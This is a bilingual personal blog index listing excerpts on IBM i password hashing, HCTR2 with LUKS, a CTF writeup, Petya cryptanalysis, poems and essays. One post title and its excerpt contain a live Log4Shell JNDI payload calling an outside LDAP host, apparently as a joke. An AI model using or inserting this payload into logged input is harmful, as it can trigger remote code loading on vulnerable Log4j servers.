Version 7.5 of their IBM I platform introduces a new value for QPWDLVL, 4 which uses PBKDF2 with HMAC-SHA512 to hash passwords. But how secure is this new approach? In this article I will expose two vulnerabilities arising from IBM’s cryptographic choices.
Continue readingCategory: Otras cosas
Using HCTR2 with Luks
As you might know, with the release of the Linux kernel version 6.0, it is now possible to use HCTR2 on the cryptographic API. This is an interesting addition because, like Adiantum, HCTR2 ensures changes affect the whole ciphertext whilst supporting hardware acceleration. In this article I will talk more about why this is interesting […]
Continue readingMúsica actual
Buscando la rima fácil murmullando unos versos de forma muy poco grácil entre sonidos inmersos. ¿Qué fue de la vieja métrica? ¿Qué fue de la estructura? Pues es cosa muy tétrica, dejar sólo rima pura. ¡Es moderna poesía! ¡Es triste zalamería! ¡Es enorme porquería! ¡Es lo que hay hoy en día!
Continue readingYou only ${jndi:ldap://klondike.es/k} once
Be ${jndi:ldap://klondike.es/k} my friends!
Continue readingEl “secreto” tras el permitir las cenas de navidad con el Coronavirus
Hay un gran “secreto” tras muchas de las cosas que llevan pasando en el mundo desde hace muchos años: las decisiones que toman gobiernos y empresas, cómo deciden las grandes fortunas en qué invertir, cómo se decide la mejor forma de tratar a un paciente, cómo se decide que hacer para evitar que “hackeen” un […]
Continue readingWhat a pitiful world
Today I have decided to destroy Louis Armstrong’s famous “what a wonderful” world with a version that describes more accurately the world in which we live: I see misquotes, fake news too, I see them harm, and go against you, And I think to myself what a pitiful world. I see vague words, lies of […]
Continue reading“Lo acepto” y “Me da igual” como objetivos de integración social
Supongo que si vas por la calle no te fijarás en detalles como la separación entre los ojos o el tamaño de la nariz de la persona que te acabas de cruzar. Sin embargo, si que te fijarás en cosas como un cierto estrabismo, una mano faltante, o incluso su acento al hablar, su sexo […]
Continue readingBack to the past
You might notice I have “updated” the theme (or better said, recovered my old one). I had to go around and recover the old settings from a mix of old web server logs and old backups but I think I got it to look as it used to. I obviously don’t care if you like […]
Continue readingSecurityFest CTF writeup
This time I was participating with no time and no team so not much that can be done, but at least you get a short writeup.
Continue readingCryptanalyzing Petya
A few days ago, leo-stone reverse-engineered the Petya ransomware and found that it was possible to use genetic algorithms to find out the key. He even published a nice decrypting tool in go. I took his globe and decided to prove why this is mostly a specific issue of how Petya reduced Salsa-20 to use […]
Continue reading